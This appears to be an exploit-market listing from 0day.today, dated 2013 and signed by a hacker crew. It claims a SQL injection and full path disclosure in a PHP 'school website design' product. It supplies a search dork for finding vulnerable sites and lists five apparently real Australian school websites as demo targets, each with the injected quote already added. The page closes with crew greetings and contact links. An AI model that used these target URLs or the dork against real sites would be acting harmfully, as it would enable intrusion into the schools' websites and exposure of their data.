[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

school website design sql injetion / Full Path discolure vulnerability

Author
The Black Devils
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-20200
Category
web applications
Date add
19-01-2013
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm The Black Devils member from Inj3ct0r Team         1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Exploit Title: school website design  sql injetion / Full Path discolure vulnerability
# Date: 11/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Phone : +447024073406
# Vendor : [ N / A ]
# Category : [ webapps ]
# Dork:  school website design inurl:curriculum.php?id=
# Type : php
# Tested on: [Windows] & [Ubuntu]

http://localhost/curriculum.php?id= [sql Injection]


when you put ' after the link the full path shows 
Demo
http://www.sbc.qld.edu.au/curriculum.php?id=65'
http://www.blaxlandhigh.com.au/curriculum.php?id=29'
http://www.spcc.nsw.edu.au/curriculum.php?id='734
http://www.ogps.vic.edu.au/curriculum.php?id=4'
http://www.stdympnas.qld.edu.au/curriculum.php?id='13




#------------------
Greet's To:r0073r & sH3LL05Dz & Dz-CombatanT & all Inj3ctor Team & Arab47.com & is-sec.org Members & 
Newbie3viLc063s & All The Algerian Hackerz
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2024-12-25]  #